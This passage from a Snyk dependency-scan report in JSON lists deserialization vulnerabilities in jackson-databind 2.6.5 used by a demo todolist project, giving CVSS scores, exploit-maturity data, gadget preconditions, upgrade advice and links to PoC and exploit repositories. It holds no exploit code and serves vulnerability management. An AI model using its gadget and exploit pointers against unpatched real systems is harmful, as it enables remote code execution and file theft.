application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n", + "epssDetails": { + "percentile": "0.94704", + "probability": "0.09270", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-5968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-w3f4-3q6j-rh82" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-22T15:40:18.105000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-18T15:40:18Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-01-23T13:17:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.857985Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.5)", + "[2.7.0, 2.8.11.1)", + "[2.9.0, 2.9.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.5", + "2.8.11.1", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1931", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.859910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n", + "epssDetails": { + "percentile": "0.99133", + "probability": "0.93631", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-7489" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cggj-fvv3-cqwv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-02-26T15:13:40.723000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-02-10T15:13:40Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-02-26T15:13:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.486075Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2341", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12814", + "title": "PoC Repository" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:15.371549Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n", + "epssDetails": { + "percentile": "0.87218", + "probability": "0.01539", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12814" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cmfg-87vq-g5g4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-19T15:28:46.421239Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-06-19T14:34:16Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-19T14:34:16Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.077144Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "College of software Nankai University" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when the feature Polymorphic Type Handling (PTH) is enabled." + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html", + "title": "Debian Security Announcement" + }, + { + "url": "https://github.com/jas502n/CVE-2019-12384", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "title": "Github Fix" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2334", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Jackson CVEs Don't Panic - Blog" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x", + "title": "Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:45.683422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.97607", + "probability": "0.53288", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12384" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mph4-vhrx-mv67" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-25T10:06:54.889582Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-28T10:27:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-25T10:26:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.734463Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.033731Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order 